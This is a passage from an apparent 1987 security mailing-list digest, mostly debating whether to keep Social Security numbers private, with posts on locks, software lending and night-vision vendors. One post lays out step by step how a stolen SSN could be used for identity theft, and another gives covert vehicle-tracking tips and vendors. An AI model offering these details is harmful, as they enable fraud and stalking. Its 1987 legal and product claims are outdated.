case-by-case basis. So, rather than having file protection to control changes, we called for discussion of any planned change. And if a stranger came to the lab and wanted to play with the computer when it was not fully needed by us--we let him! Chances are he would appreciate some of the value of our work, learn from it, and spread the knowledge to others. At best, he would become enthusiastic for our software and our attitudes, join our lab, and contribute to our work. People hearing about our lab usually took it for granted that our system would be destroyed by vandals. Actually, vandalism was very rare, and the damage done by vandals was small compared with the damage caused by the inevitable computer malfunctions and our own mistakes. Simple measures analogous to the glass window on a fire alarm discouraged dangerous activities, deliberate or accidental, without actually forbidding anything. Ultimately it was rising commercialism that destroyed the lab and caused our old computer system to be junked. The technology of computer security is not suited to any middle ground between the extremes. Unless security is iron-fisted and dominates the lives of the users, it is easy to circumvent, and useless. We should put military secrets, bank records and the like on computers with strict security. For other activities, we should have computers that are free of security, and free of its burdens. Then we need not attack the symptom of morally confused crackers with jail threats, security technology, or hiring them as security enforcers to breed more resentment and new crackers. We can invite them to use computers openly on terms of mutual respect, and they will repay our friendship tenfold. Their cleverness and curiosity are just what make for a creative engineer. So far the issue of security versus freedom on computer systems affects mainly computer hackers. But, in the future, computer systems will play a bigger and bigger role in everyone's life. And these systems will be built on today's entrenched authoritarian tradition, unless we stop it. The crackers are a warning sign of a problem that every American is going to face--soon. From: *Hobbit* 11-Nov-1987 03:43:25 To: security@red.rutgers.edu Subj: [19078] Yet more about SS numbers Hopefully this is the last of it... _H* -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Subject: Another no SSN reason Date: Fri, 02 Oct 87 22:38:30 -0400 From: new@udel.edu Nark Mason writes about Social Security Numbers: >I still haven't seen anyone give a good reason *why* to keep it [your >SSN] secure. ... What horrible ded can be done with it that makes it not >worth giving it out and the hassle that might follow? Well, here's a story that happened to a good friend of mine that I wouldn't want to worry about. She sent in her tax returns, and got a letter saying she still owed $6000 for the money that she inherited, plus fines and interrest and a possible jail sentence. It turns out that someone, somewhere had inherited money and made up an SSN at random to avoid the taxes. After about six months of "hassle" (to say the least) she finally convinced the IRS that she did not inherit anything. She was able to do this only because the name did not match the SSN, and the address was in New York instead of her actual address near Phila. Now, I have been fighting institutions that use my SSN as a key primarily because most of these insist on printing it on the mailing label along with my name and address. They claim this is so that when mail comes back (mail that most people would consider "junk mail" anyway), they can remove the name easily from the mailing list. Can you imagine the "hassles" I could have if the clerk at the institution plans ahead for a successful trip to Atlantic City or Vegas, taking a few names, addresses, and SSNs along? How about the postal clerks that get to read my SSNs? My main complaint is not with the institution that uses my SSN as a key, but rather the uses other than as a key to which it is put. Incidently, does anyone use a database package that can handle sufficient volume that names cause too many clashes, yet that does not have a mechanism for generating unique keys? Why must I supply my own key? Not only am I reduced to a "mere number," but I must reduce MYSELF to a number. Regarding Government agencies requirements, what about Federally funded institutions? Can universities that are federally assisted demand my SSN? - Darren New University of Delaware new@dewey.udel.edu -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Mon, 5 Oct 87 09:33:45 cdt From: Jonathan Harris Subject: SSN's why get so upset about it. After all this talk of people not giving out social security numbers to utilities and such, I have yet to hear anyone explain what is the harm in giving it out and why it is worth all of this fuss. True, the social security number is really meant for social security and tax administration, but what harm can someone do if he finds your SSN. Apparently nothing; that is unless you are a deadbeat intending to skip down and refuse to pay your phone/electric bill. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Mon, 5 Oct 87 21:51:27 EDT From: Douglas Humphrey Subject: Re: ssn's >So the real question is this: > How many databases list my MIT 888 number as my SSN I would hope that most peoples data bases have some sort of validity check on SSNs, since you can call the SSA and get a definition of the SSN from them, and it does mention at least some of the field values that are 'not right'. I saw a spec for this stuff about 5 years ago perhaps in a Government RFP or something. Maybe a call to the SSA would answer this? -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 06 Oct 87 08:53:04 EDT From: "A. Harry Williams" Subject: Re: Digest of SSN responses I find the response to both SSN and phone numbers as "If you don't have anything to hide, why not give it out". That is the same argument as if the defendant doesn't take the stand in a criminal trial, he must be guilty. Also, I'm not sure that US SSN have a checksum. My sisters and I have consecutive SSNs. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 6 Oct 87 12:20:01 EDT From: Larry Hunter Subject: Re: Why Protect SSNs? Well, the practical reasons to associate your SSN with as few records about you as possible have to do with the fact that large, powerful entities (like the IRS and large consumer products companies) use techniques like block modelling and record matching to exert unpleasant power over individuals. For example, the IRS uses social security numbers to look up credit ratings and self-described income data associated with consumer purchases (those little warrantee registration cards...) to audit people it thinks may be under-reporting income. Big credit and insurance concerns use SSNs to find records that can penalize you by denying you credit or insurance on the basis of information that you rarely see and never know how they get. Other uses include targeting the marketing consumer products and matching government records against each other or commercial records. Those large tax, law enforcement and marketing data analyses are more difficult to do on someone who witholds SSN. Unfortunately, the cause of most of the trouble is invisible to the people who get screwed. Nobody says "we decided to audit you (investigate you, use this ad on you) because of information we could analyse based on your SSN." It is quite difficult to track down the explicit uses of SSNs within specific organizations; they are not interested in baring their data analysis techniques to outsiders at all. So for illustrative purposes, let me show how with your social security number and a little motivation someone can learn all of the intimate details of your life, ruin your credit rating and get warrants issued for your arrest: Your enemy gets your social security number. He goes to the local department of motor vehicles and get a driver's license in your name by telling them he lost it and giving them your SSN. Knowing your driver's license number (SSN in many states) is usually sufficient ID for getting a replacement license. He takes the driver's license to the social security office, tells them the appropriate SSN and asks for "his" payment record. They tell him your employer, your income, any interest bearing bank accounts you have and any securities you have bought or sold in the last 3 years and some odd months. He can find out the medical insurance company used by your employer and get your medical records from them in a similar way. He can also use the employment information along with your SSN to get credit cards in your name (credit card grantors use SSNs to access your credit records, and want little information on you other than SSN, employer and bank accounts). After buying a fast new car on your credit, he gets a lot of speeding tickets on your license. The criminal warrants that show up when he doesn't pay the tickets are attached to your social security number. If he really wants to get you in trouble, he gets busted for drunk driving or hit and run on your license, makes bail and throws the license away. You now have a mountain of bad debt and a felony arrest warrant, not to mention an enemy who knows every penny you have, what your credit record is like and all of your medical history. He got it all by just knowing your SSN. Paranoid? Sure. I don't think this sort of thing happens very often, but it provides an idea of the power in those 9 digits. I personally believe that the institutional (mis)use of SSNs is by far a worse problem than the kind of criminal behavior I just described, but I find the latter is more persuasive to people who are cavalier about having "nothing to hide". Try reading David Burnham's "The Rise of the Computer State" or his upcoming book on the IRS, or Robert Ellis Smith's "Privacy: How to Protect What's Left of It" for more detailed discussions. Larry Hunter -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: 6 OCT 1987 22:51:13 EDT From: "Bryan, Jerry" Subject: Digest of SSN responses The Privacy Act of 1974 does *not* mention universities by name. I quote as follows: "Sec. 7.(a)(1) It shall be unlawful for any Federal, State or local agency to deny to any individual any right, benefit, or privilege provided by law because of such individual's refusal to disclose his social security account number." That all sounds well and good, except for the following little "gottcha's". 1 -- The original Privacy Act included the following exception: "(2) the provisions of paragraph (1) of this subsection shall not apply with respect to (A) and disclosure which is required by Federal statute" Note that "disclosures which are required by Federal statute" are legion. For example, open a bank account, register for the draft, etc. 2 -- the privacy act is grandfathered, so that anybody doing it before January 1, 1975 can keep doing it 3 -- Congress has passed many, many exemptions and exceptions to the original Privacy Act, the worst of which is specifically authorizing states to use SSN's for driver's licenses and vehicle registration (Tax Reform Act of 1979). 4 -- The clause in the original law making it apply to "any right, benefit, or privilege provided by law" is a pretty stiff test, according to lawyers who handled a SSN refusal case for me. It is pretty hard to convince a judge that attendance at a university is a "right, benefit, or privilege provided by law". And even if you did, the laws establishing universities in most states are ones which have been exempted from the Privacy Act by subsequent legislation (the Tax Reform Act of 1979). 5 -- The original Privacy Act contained no penalty for violation. Again, according to my lawyers, a law with no penalty is essentially unenforcable. What is needed is something like a $1000 fine for every violation. Can you imagine how quickly a university would straighten up if it had to pay $1000 for every student for which it used an SSN as a student ID? As an example of how tangled these webs can become, both the folks giving ACT tests and SAT tests key the results off of SSN's, and these are private organizations utterly uncovered by any privacy legislation. Most (all?) universities that receive ACT and/or SAT scores match them up with their students via SSN's. Thus, universities have a valid, practically mandatory reason for having the SSN for all students on file, even if they do not use SSN for student ID. Furthermore, if the university is involved at all in the disbursement of federal money to students (various student loans, etc.), the feds will *require* SSN's for all the students involved. What's the poor university to do? Finally, grant applications to such agencies as National Institute of Health and National Science Foundation require the SSN's of all professors and students who will use the money? Again, what is the university to do? It really is too late, folks. Big Brother is already here, alive and well. And even Mr. Reagan with all his "get the government off the back of the people" rhetoric has greatly expanded Big Brother, provided only that it is in support of his declared social goals -- catching welfare cheats and such. The ends do justify the means, you know, as long as it is your own ends you are after. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: mtune!mtgzy!norm@RUTGERS.EDU (n.e.andrews) Subject: Re: ssn's Date: 7 Oct 87 15:29:29 GMT > Why bother? What horrible deed can be done with it that makes it worth > not giving it out and the hassle that might follow? False income tax returns could be filed against someone's social security number. I suspect the consequences of that could qualify as a hassle... There must be other bad things that could be done using people's social security numbers, all of which could cause the real owner a lot of unnecessary trouble. I never did like the idea of tying the unlimited power of the State so intimately to everyone's personal business... -Norm Andrews, speaking for himself -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: matt@oddjob.uchicago.edu (Godfather to putty-tats) Subject: Re: ssn's Date: 9 Oct 87 21:28:58 GMT Guess who asked for my SSN this week. The Phone Company. I was ordering new service preperatory to moving and they first asked for employment information. I said "You don't really need that, do you? I'm a current customer and you know I pay my bills." The clerk said "Just a moment", then read me my employer's name and my (previous) title! Then she asked for my SSN to "complete their records". I hollered quietly and she said, "Actually, you can decline." Matt Crawford -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: mcb@lll-tis.arpa (Michael C. Berch) Subject: Re: ssn's Date: 8 Oct 87 23:06:48 GMT To: This came up before in a Usenet newsgroup and is worth reiterating here. Look: I don't care what your feelings about giving out SSNs are, or what effect it has on your privacy, or how the country is going to hell in a handbasket because of the pervasive use of SSNs. Just DON'T, under any circumstances, just "make up a number" and give it out. The odds that it is already assigned are substantial. (And don't weasel around about how the 900's aren't used for SSNs; they're used by the IRS as "Taxpayer Identification Numbers" (TINs) and belong to people/corporations, too.) If I got tangled up in a bureaucratic mess about some purchase or payment or tax matter because some pinhead "made up a number" and it happened to be mine, I would be massively (and justifiably) pissed off. "Making up a number" is an anti-social, offensive thing to do, and one that (even given my laissez-faire, anti-authoritarian point of view) I would not hesitate to report to criminal authorities if I discovered it. Michael C. Berch ARPA: mcb@lll-tis.arpa UUCP: {ames,ihnp4,lll-crg,lll-lcc,mordor}!lll-tis!mcb -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sun, 11 Oct 87 23:06:51 EDT From: lear@aramis.rutgers.edu (eliot lear) Subject: Re: ssn's Hi Curios, If someone wants to do a credit check on you, generally they need only your ssn and your permission. If they don't have the latter, they shouldn't have the former. Eliot -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Mon, 12 Oct 87 08:31-0700 From: The Bandit Subject: moron social security numbers. I have seen numerous messages fly by these past few weeks regarding the sense (or nonsense) of keeping one's ssn private. All too often people declare that ssn's are unique. Would that this were true, but, unfortunately, it is not. Because uniqueness is not guaranteed, I prefer not to give out my ssn. I certainly wouldn't want someone's tainted credit rating affecting my rating, nor would I wish to demolish someone else's -- were such dire things to occur. Derek Haining Academic Computing Services University of Washington Seattle, Washington (206) 543-5852 DEREK@UWARITA.BITNET -or- DEREK@RITA.ACS.WASHINGTON.EDU -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Fri, 16 Oct 87 11:02:00 EDT From: "Una R. Smith" Subject: SSN Yes, it's much easier for people to manipulate information about you in a computer when they have your SSN, since it's a variable that can be matched so easily. But the flip side of that coin is what worries me. Think how easy, with a NINE digit number, it is for data coders to make keystroke errors. Of course this can happen with your name, but names have familiar patterns, or are very unfamiliar. Either way, the rate of error should be lower for coding names. But even if it isn't, that's ok, because few (if any) organizations with information about you will ever even attempt to merge data by your name. If 2 files are being combined, and your name is the common variable, and there is an error in 1 name record, there is no match. But if the SSN is used, and a coding error has occurred, there is the chance that SOMEONE ELSE'S history will be appended to your name, either under your SSN, or under theirs, depending on the coding error. Now, if you are a bad customer or whatever, you don't really care if this happens, because the chances are your history will only be improved. But if you are one of those sterling types who always pay on time, etc. and you "have nothing to hide, so why not give the SSN without a fuss", you might be burned badly. And even if the error isn't terrible, getting the problem fixed can take a long time. Just try telling someone that thier records on you are WRONG, especially if they have them on a computer. The chances are high that you will only get to talk to someone who either 1) believes computers don't make mistakes, or 2) is afraid of the computer, or 3) doesn't know how to correct the records on you, since they are hidden in the computer, and doesn't want to bother finding out, or 4) CAN NOT change the data in the computer because someone down the line never imagined that changes would be necessary. If you think any of the 4 cases above is unrealistic, let me assure you that I know of instances of all 4 cases occuring. My mother is still fighting the property tax administrator in her city after 2 years because the records she got out of his computer database, thanks to a naive underling, do not agree with the tax assessments people in her neighborhood have been paying. The difference, she has discovered, amounts to nearly a million dollars annually coming out of single family residences instead of appartment complexes. The tax administrator's office has been stonewalling for over 2 years because they won't admit that there is no way, currently, for them to get to the actual data; they insist "the printout is wrong." This is clearly an example of case 4 above, with maybe a little old-fashioned corruption thrown in for good measure. Recently someone said he hadn't withheld his SSN in the past, so there is no point to beginning now. I strongly disagree. No one is going to make any great effort to match SSN's to data about you by hand, and it's unlikely that if they do have your SSN that they also have a way of looking at your name and address via computer. After all, the SSN is so handy just because it lets merchants, etc. treat your name as just the first line of your address. The format is often free-form, and it is difficult to extract your name in program-driven databases. They certainly won't get any help from the SS Administration. From: tektronix!reed!percival!jamesd@cad.Berkeley.EDU (James Deibele) 4-Nov-1987 03:08:04 To: reed!tektronix.UUCP!ucbcad!red.rutgers.edu!security Subj: [1265] Re: forwarded mail Sorry for the lack of clarity. Tests in stores showed that there was a shortage rate of 30% in stores that weren't protected by the Knogo systems. That figure includes employee theft, shoplifting, miscounts of shipments (the clerk counted 13 when there were only 12), and so forth. The major components of the shortage figure are the first two. It's very easy to put a piece of software in a bag and walk out with it. Dalton's uses 6-foot shelves, which the clerks can't see over (legacy of the bookstores, where an individual item isn't worth all that much---software, however, goes $300, $400, even $700). The impulse shoplifter --- "I want Gunship, but I don't want to pay $35" --- is deterred by the increased risk of apprehension (supposedly), and they make up the most part of Dalton's shoplifting problem. Kids after school killing time in the mall, etc. won't take the chance if they think there's a high risk of getting caught. Sort of similar to radar --- people think it works better than it actually does. Fortunately, there are less thieves than speeders. From: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net 4-Nov-1987 17:49:18 To: security@RUTGERS.EDU Subj: [1422] RE: the KEY Discussions Interesting things coming thru on all this KEY stuff. I've got a couple of questions which deal with the mechanics of a couple of keying systems. Wish I could remember the names of the manufacturers, but I'll just have to plead brain death. The two key systems worked (I believe) in completely different ways (or at least, the mechanisms were very different). One had no slots, per se. Instead, it essentially looked like a blank with a number of dimples of differing sizes drilled on both sides of the blank. The second system was supposed to have been THE keying system of that time (this is all from my college days, about 11 years ago). This system had keys which had the cuts not only at the normal angles of +/- 15 (?) degrees but also had the cuts themselves offset at (I believe) +/- 5 degree angles. In other words, instead of just making the cuts at an angle perpendicular to the key, the cuts were offset at angles of 0, +5 and -5 from the perpendicular. I know I'll recognise the name of the keying system as soon as someone mentions it, but right now, I'm completely brain dead. Anyway, the question is...How do each of the above keying systems work? Warren M. Iwamoto Artificial Intelligence Laboratory Texas Instruments, Inc. Dallas, TX. iwamoto%ngstl1@eg.ti.com From: mark@ems.mn.org (Mark H. Colburn) 5-Nov-1987 06:28:39 To: misc-security@RUTGERS.EDU Subj: [1037] Re: DES is NOT legally required I was discussing encryption with some of the CYBER gods who work at Control Data Corporation here in Minneapolis. Apparently, when they initially started shipping their latest release of NOS, they were going to use this hot new encryption algorithm which somebody at CDC came up with. However, when they decided that they were going to ship the software out of the country, they found that the NSA (I believe, it has been awhile), was requiring that they provide the algorithm for deciphering an encrypted message. Apparently there was no limit on how complex the solution was as long as it was gaurenteable that the algorithm did work. Eventually they gave up on the new encryption method, since they could not come up with an algorithm which would work. -- Mark H. Colburn DOMAIN: mark@ems.MN.ORG EMS/McGraw-Hill UUCP: ihnp4!meccts!ems!mark AT&T: (612) 829-8200 From: Larry Hunter 6-Nov-1987 02:19:18 To: security@red.rutgers.edu Subj: [1546] Bumper Beepers. Some interesting tidbits for tracking automobiles: Bumper beepers are great, but get some practice before you depend on one. Signals reflected off buildings, obscured by underground garages, rapidly accellerating as they get on the freeway, etc. are all confusing. Following a vehicle without being detected takes practice. The beeper just makes it possible to do with one tail car instead of two or three. With an aircraft, one of these guys can identify the location of a vehicle within 25 or 50 miles. Have fun! Places to buy: Wynn Engineering / 4327 Aspenglen Dr. / Houston TX 77084 sells a bumper beeper set that "When installed on your car, you can track the distance and direction of the car from up to 2 miles away. Beeper and special receiver (Model BB 1101) $600 for the set." Law Enforcement Associates / 88 Holmes St./ Belleville NJ 07109 sells a better system (made by TRACER) called the 1012 Vehicle Follower System. It's better because the beeper beeps instead of emitting a continuous tone (saves on batteries!) and it gives a more specific readout of the direction of the target. Expect to pay over $1000. Write for a current catalog. And by the way, US Citizens have no reasonable expectation of privacy regarding movements tracked in public, said the Supreme Court in 1983: US v. Knotts, 103 S. Ct. 1081 (1983). Larry From: marks@Sun.COM (Mark Stein) 6-Nov-1987 16:29:41 To: security@red.rutgers.edu Subj: [611] re: master keys > Talking about master keys and such, has anyone seen a type of > key that has no teeth and it is just a straight piece of metal? > I think they had "safety" stamped on them but I am not sure. > When I was a little kid I had a couple but never found out what > they were for. I remember seeing one of these a long time ago. As I recall, they were provided with bathroom (indoor) locksets. They were intended to go through the hole on the outside knob to unlock the door. --Mark Stein From: *Hobbit* 7-Nov-1987 23:20:06 To: security@RED.RUTGERS.EDU Subj: [503] kappy kludges fern frob If you leave the coil of a relay across the line all the time, it probably will never hang up properly. If the DC resistance happens to be high enough to allow on-hook [good luck] you'll still create a leak path and lose big when it rings. If you want to sense line voltage quietly, use something involving a 40v zener, a FET, and an optoisolator or something... _H* From: padwa%harvsc3@harvard.harvard.edu (Danny Padwa) 4-Nov-1987 08:51:05 To: "security@red.rutgers.edu"%hucsc@harvard.harvard.edu Subj: [1482] Microcomputer Software Security At Harvard, several of our classes require the use of micros, and we handle software for them as follows: When students wish to use the microcomputer software, they come into the User Services office (right by the micro room). Although US people (such as myself) are primarily responsible for mainframe questions, they also loan out the software. The first time a student comes in to borrow software, they sign a waiver, effectively promising not to steal, copy, or eat our disks. Then, they cam take out software whenever they want (the question-answering people are there 8AM-midnight weekdays, and almost that on weekends), just by presenting their IDs (held only for "important" software----I didn't make up this policy!!!) and signing the software out in our log...pretty straightforward. The only real problem we've had with this is that the User Services people get bogged down dealing with the micro software and cannot devote enough attention to the big machines (they also have to run backups). But all in all it is a pretty good system, and can work extremely well if you have a work-study student (or the like) handling the library (most students will love a job where they can do a significant amount of homework while working!! Good Luck!!! Danny Padwa Harvard University From: webber@brandx.rutgers.edu (Webber) 8-Nov-1987 05:11:12 To: misc-security@RUTGERS.EDU Subj: [1244] paranoia is not the issue > You _can_ freeze the system and audit it from the outside. On my > system I would build an audit program on a bootable floppy and > keep it in a safe place. I'm not that paranoid - I believe that > I'm not a sufficiently desirable target to expect really sophisticated > viral attacks. It is not really an issue of being a specific target. Recent trojan horse problems reported on the micro boards seem to be traceable back to code put on disks by software vendors as an effort at copy protection. The subsequent victims being merely people who traded disks with people who traded disks with people who traded disks with people who maybe pirated software. Ultimately, a well-written destructive virus is much like a bomb in the marketplace -- lots of bystanders who weren't aware they were part of a quarrel. And considering the other bugs in vendor's software, it is not all that unreasonable to expect that occasionally their copyprotect stuff will misfire -- sort of puts a new light on all those disclaimers, don't it? ------ BOB (webber@aramis.rutgers.edu ; rutgers!aramis.rutgers.edu!webber) From: hpscda!hpscdl!hplabs!well!rab@seismo.css.gov (Bob Bickford) 8-Nov-1987 06:42:36 To: security Subj: [555] Re: master keys Jose Rodriguez writes: + Talking about master keys and such, has anyone seen a type of + key that has no teeth and it is just a straight piece of metal? They're magnetic, assuming we're talking about the same thing. The matching lock has an inverse set of magnets and will open when you hold the key next to it (or inside it, on some). -- Robert Bickford {hplabs, ucbvax, lll-lcc, ptsfa}!well!rab From: Jeff Rothenberg 8-Nov-1987 17:09:38 To: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez) Subj: [408] Re: night scope I gather you do not know about Edmund Scientific. They are a catalog house with all sorts of stuff like this (plus lots more). They are: Edmund Scientific Co. 101 E. Gloucester Pike Barrington, NJ 08007 1-609-573-6250 1-609-547-3488 From: *Hobbit* 9-Nov-1987 05:57:30 To: security@RED.RUTGERS.EDU Subj: [581] Internal setscrews The from-the-inside setscrews that Best is infamous for aren't a guarantee against tampering. A certain proportion of the locks in a large campus system will "default" to the control shear line during picking. A determined individual *will* eventually manage to obtain one; there's not a lot you can do about it short of posting guards at all the doors. Does Medeco or Abloy have any such mechanism? *That* would make things pretty difficult... _H* From: TS5864%OHSTVMB.BITNET@jade.berkeley.edu (Thomas Lapp) 9-Nov-1987 08:56:12 To: SECURITY@red.rutgers.edu (Security Digest) Subj: [1265] RE: LoJack Homing device I recall seeing a television segment on LoJack (20/20?). In the segment they indicated that, yes, it wasn't cheap, and yes, it worked for several dozen miles. However, it *does* require that the police install the activation transmitter on a high point, and requires fitting the cruisers with LoJack receivers. The cost of this is prohibitive except for areas of high auto theft. At the airing of the segment on TV (several months ago), LoJack was only in use in the Boston,MA area. Several other cities were looking into it, but had not made any discision to go ahead. So unless you live in the Boston area, you are out of luck when it comes to LoJack. -tom ======================================================================= Thomas Lapp | "Never Sniff a Gift | Fish" BITNET: TS5864@OHSTVMB.BITNET | ARPA: TS5864%OHSTVMB.BITNET@wiscvm.wisc.edu | INTERNET: LAPPT@ee-eagle.ohio-state.edu | ======================================================================= From: gwyn@brl-smoke.arpa (Doug Gwyn ) 9-Nov-1987 15:12:38 To: misc-security@uunet.uu.net Subj: [696] Re: untoothed keys Jose Rodriguez writes: >Talking about master keys and such, has anyone seen a type of >key that has no teeth and it is just a straight piece of metal? There are several keys that could fit such a description. Were there ANY external encodings at all, such as wiggly grooves (Bell lock) or dimples (Sargent KESO)? If not, this may have been a magnetic key. There were some cheap padlocks that one opened by placing a flat key against the side; embedded magnets reacted on magnets inside the lock to align gates. That lock yielded easily to physical force, however. From: Mike Linnig 9-Nov-1987 23:44:02 To: security@RUTGERS.EDU Subj: [819] master key security Doug Gwyn's comments about some locks being somewhat difficult to remove unless you have the control key brings the following to mind... What will the administration do if they find such a lock has been removed by brute force (ie. saber sawing it out of the door)? Surely this implies that the whole master keying system is compromised. Ideally, they would rekey all the locks. In practice I assume that they would shrug their shoulders and hope no one starts using master keys. It must be very expensive to rekey all the locks on a campus. Mike Linnig ps. I too do not advocate property damage, but it is amazing how vunerable these systems are to thoughtful attack. From: Bill Sommerfeld 9-Nov-1987 21:39:13 To: *Hobbit* Subj: [402] Re: hotel deadbolt hacks > Probably against fire regs, but it works. I don't see why; all that matters is that you be able to get OUT, not that others be able to get in.. besides, fire fighters have a reputation for using an axe when a doorknob would do. - Bill From: warren hik 10-Nov-1987 12:21:56 To: SECURITY@RED.RUTGERS.EDU Subj: [2569] RE: PC Lab Security >> Have one PC in your lab designated as a file server. Student >> must bring their own floppies and copy any needed software >> off the (read-only) hard disk of the file server onto THIER OWN DISKS. >Doesn't this present some legal problems due to the copyright laws? >Doesn't this also present some technical problems due to copy protections? It is legal, and widely accepted on the following terms. a) the software is licensed for a certain site. b) the copy of the original software (by the student) is only used at the licensed site. c) the copied software is for the exclusive use of the student. d) the student must sign a contract stating that they will not let anyone else use the software, nor will it be run (used) OUTSIDE of the licensed lab environment. The software must also be deleted at the end of the required course period. Breaking any of which, is punishable by fine (equal to that which may be charged the license site for breaking copywrite) or EXPULSION. >At BC, I believe we presently use a Check-Point security system. This system >is easy to fool if you know a trick or two, but has served as a GOOD deterrent This is a "Good Deterrent": By using the already existing copyright laws, and those of the institution regarding expulsion (one would want to believe that they were created for some purpose). An example of using the LAW as the deterrent over spending many more dollars for electronic security devices, clerks and security officers, and computer administration and accounting is: Stop signs. That's right, why do we stop at a stop sign if it is 2:00 a.m. and there are no other cars in sight?? Because it is the law. If you go through and are caught (big IF here!) you face a $53 fine, some demerit points, and surly when your insurance company finds out about this, you could face a rude awakening in premium prices (don't take my word for it, contact your local newspaper and find out the number of people in your city that complain about being shafted by insurance companies (particularily car insurance)). Anyway to make a long story short, if the system can be fooled by those who really want to, use existing laws to deter people, not expensive machinery and people who could be used more effectively helping others with problems or doing research of their own, instead of being glorified secretaries. Sorry for rambling. -Warren. From: "Michael A. Shiels" 10-Nov-1987 12:22:00 To: misc-security%math.waterloo.edu@relay.cs.net Subj: [631] Re: Securing Floppy's There is another solution to the software stealing problem. Install a protection ROM into the motherboard and then each one of the .EXEs or .COMs is run through an encryptor and will require the ROM to work properly. It seems to work great on campus here. Look in comp.newprod for an announcement of MaS-DProtect and MaS-RProtecty -- Michael A. Shiels (MaS Network Software) mshiels@orchid.waterloo.EDU UUCP: ...path...!watmath!orchid!mshiels From: herbison%ultra.DEC@decwrl.dec.com 11-Nov-1987 11:42:24 To: Security@Red.Rutgers.EDU, HERBISON@decwrl.dec.com Subj: [3306] Re: Why secure systems? Nick Papadakis presents an essay by RMS that argues that computers should be open rather than secure. This may work for many computers, but I believe it is wrong to take this approach for all computer systems. The main reason for my belief is that large numbers of computers are used for critical operations of various types. RMS says that vandalism `was very rare' on the systems he used as an example. This means that there were very few people vandalizing the system just because it was there (the vandals had no other reason to do damage). But for many computer systems, there are other reasons to do damage: To hurt the organization that runs the computer. To gain financially. To change the `real work' done by the computer. Imaging running the following computers openly, without security: - A computer that handles the payroll and accounting for a corporation. A `minor' piece of vandalism could bankrupt the corporation and ruin the lives of employees that financially survive from check to check. - A computer used to develop the software for a piece of hospital equipment. Errors caused by someone who didn't know what they were doing could endanger the lives of large numbers of people. - A computer that is used to count votes. The basic freedoms that we have in this country depend on fair votes, but insecure voting systems could allow any fanatic to change the result of a vote and of history. - A computer that supports the operation of the stock market. In a few minutes a compromised computer system could place enough fake sell orders to make the October crash look minor. Sure, eventually it would be detected that that the original sell orders that triggered the crash were fake, but by that time the world economic system would be a shambles and saying `lets forget all of the trades on all the markets in the last week' wouldn't work. Running an open computer system is a great idea, and should be done whenever possible. But don't do it when sensitive operations are on the line (including, but not limited to, finance, investment, accounting, health, personal data, and voting). Or at least wait until it can be shown that people can be trusted. A suggested metric: When a year passes without any instances of fraud or robbery worldwide. Our need for computer security just reflects the fact that we cannot trust that all members of society will always act for the benefit of society. As long as this is true it isn't safe to open all computer systems to everyone. Criminal acts did not start with computers, and I don't believe that opening up computer systems will end criminal acts. B.J. From: UJ0%psuvma.bitnet@RUTGERS.EDU 11-Nov-1987 15:33:53 To: rutgers!misc-security@e.ms.uky.edu Subj: [3324] Re: night scope There are lots of places where you can allegedly get night vision devices... I'm not sure if they're all bonafide. However, a few that come to mind are: NIGHT VISION DEVICES: AN/PVS-3A starlight scope Excalibur Enterprises AN/PVS-4 starlight scope P.O. Box 266 AN/PAS-4 IR scope Emmaus, PA 18049 AN/PAS-6 IR scope (215) 791-5710 (military issue) IR binocs, scopes CCS Communication Control, Inc. 160 Midland Ave. Port Chester, NY 10573 (914) 934-8100 AN/PVS-2 ind. weap. sight LRRP Security Services, Inc. AN/TVS-2 crew weap. sight Box 1620 (military issue) Aiken, SC 29801 (803) 649-5936 AN/PAS-5 IR binoc/goggles G.S.A.D. Inc. (Israeli army issue) 205 South Kuhn Drive Manhattan Beach, CA 90266 (213) 374-4086 scopes, binocs... LEA Law Enforcement Associates 700 Plaza Drive Harmon Meadows/Route 3 West Secaucus, NJ 07094 (201) 864-0001 AN/PAS-5 The Dutchman P.O. Box 12548 Overland Park, KS 66212 1-800-821-5157 scopes, binocs... Microtron 42-38th Street Wheeling, WV 26003 (304) 233-8007 LASER GUNSIGHTS/TARGET DESIGNATORS Executive Protection Products, Inc. 1834 First St., Suite S Napa, CA 94559 (707) 253-7142 API Marketing 1600 Monrovia Ave. Newport Beach, CA 92663 (714) 722-9087 Some of these companies sell active IR systems for as low as $400 or less... the starlight scopes are certain to be at least around $1000. While I'm not in a position to make any endorsements or recommendations ("just an interested observer"), obviously ambient IR and starlight scopes are the best, since no external light source is involved (with the other systems, someone else with an IR system will see your 20,000 candlepower searchlight plenty fine as you slink through the foliage thinking you're invisible) but it all depends on what you plan to use it for. Definitely keep in mind that these, as with all elec- tronic devices, have very delicate innards, and as a weapon sight, it will take quite a bit of abuse (rifle recoil, temperature, humidity) so get the beef on it from the people you're dealing with. Another good way they can quickly get toasted is from an overexposure (someone shining a light into your image intensifier, a sudden heat source appearing, etc...). Some are protected, but I believe many aren't. That's about all I can contribute for now... let me know how you make out. From: bzs@bu-cs.bu.edu (Barry Shein) 11-Nov-1987 15:59:54 To: nick%MC.LCS.MIT.EDU@eddie.mit.edu Subj: [3168] Why secure systems? Richard is basically correct about his social assessment of centralized computing services. He characterizes the situation as being akin to the Soviet Union, I would say more like martial law in a scarce resources situation (which, some argue, is really what explains the current situation in the Soviet Union, sort of an emergency restriction on freedom that has been convenient to leave in place these 70 years, for some.) Today the situation of the central computing facility is becoming more curious. The resources are no longer terribly scarce but the "oligarchy" continues in their ways. For example, on our large IBM a student account is assigned about 1MB of disk storage (max.) He can of course try to ask for more but the bureaucracy can be very discouraging. That's about the storage of a single floppy disk in today's world. How ludicrous it must look to a student who just bought a PC with a 20MB disk for $900 that he is far more limited on this $6M machine! Other resources are similarly restricted (eg. the biggest memory image anyone can run is 11MB even tho it has 64MB physical, and this is touted to the campus as some sort of super-computer, achh, pfft.) The focus is no longer on the cracker. What is happening today is that these computing organizations are becoming wholly irrelevant to anyone other than a very small 